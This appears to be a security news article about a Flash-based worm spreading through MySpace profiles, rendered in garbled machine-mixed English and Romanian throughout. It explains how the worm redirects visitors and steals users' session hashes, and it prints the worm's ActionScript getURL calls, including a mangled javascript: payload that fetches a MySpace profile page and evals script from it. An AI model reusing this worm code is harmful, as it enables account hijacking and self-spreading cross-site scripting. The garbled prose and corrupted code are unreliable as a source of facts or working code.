MySpace has been infected by Fulger baz� (swf) worm care �ntindere rapidly g�t MySpace. Acesta este embedding JavaScript code into users' profiles that redirects visitors la spre un site claiming art.hot. U.S. guvern was behind art.hot. 9/11 terrorist ata�at, Symantec warned Luni Totu�i it Mai a fi chiar art.hot. v�rf de la iceberg. Let's a lua un prive�te la cum it works la spre understand cum it a putea a fi easily modified la spre a furniza much devastating payloads.

Art.hot. unnamed worm isn't malicious numai art.hot. Shockwave Fulger (.swf) dosar containing art.hot. payload embeds JavaScript into art.hot. profile de orice MySpace user cine vedere art.hot. .swf dosar. This a putea easily replicate Samy is prietenul meu worm f�r� gustare de diminea�� un pulover.

This javascript code trec.de la will apoi atunci a fi interpret by orice user cine visited art.hot. site, allowing sensitive date la spre a fi stolen, such as un hash value a cere la spre a aduce afar� opera�ie as un user, �i performing opera�ie on behalf de that users ( f�r� consent obviously). Curent, that accent is being folosit unic la spre �ntindere art.hot. JavaScript code la spre alt profiles pe popular socialist re�ea site.

Dac� art.hot. payload is malicious, it a putea a aduce afar� secund� ata�at asem�n�tor targeting recently a descoperi vulnerabilities a afecta Microsoft Serviciu contact. Art.hot. impact trec.de la will a fi much higher expunere sear� sensitive informa�ii on al t�u tare- disc.

Let's a lua un prive�te la art.hot. worm, mul�umiri la spre research by kinematic.theory:

C�nd tu visited un already infected pagin�, acolo is un Fulger object embedded ("redirect.swf") care contact art.hot. actionscript:
getURL("url");

It deschidere �i redirects tu la specified blog URL.

On this blog url acolo is alt fulger dosar embedded "retrievecookie.swf". It contact:

getURL("javas\n\rcript: var x = nou ActiveXObject'Msxml2.XMLHTTP'x.open'GET','http(\\);(\\\:/editprofile.myspace.com/index.cfm?/fuseactionuser.HomeCommentsfriendID93634373',truex.onreadystatechangefunctionif=&=\);=(){ (x.readyState4var==){ pgx.responseTextvar=; scpg.substringpg.indexOf'BX=((\-\'3,pg.indexOf')+(\-EX'whilesc.indexOf'\));(((\
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1var)){ nsc.indexOf'=(\
\'ifn);(==-1nsc.indexOf')=(\-XXX'scsc.substring0,nsc.substringn5,sc.length\);=()+(+);};" + "evalsc();}};" + "x.sendnull();", "");

It deschidere alt blog post(link) �i evaluates s�u contents.

This code gets al t�u MySpace hash care allows anyone la spre act as tu on MySpace �i parfum orice opera�ie on al t�u behalf asem�n�tor scimbare al t�u password sau adding ni�te unknown as al t�u prieten, ceva tu po�i a face on MySpace. Curent art.hot. code adds un mesaj la spre al t�u MySpace profile. It extensively folos AJAX pentru s�u opera�ie.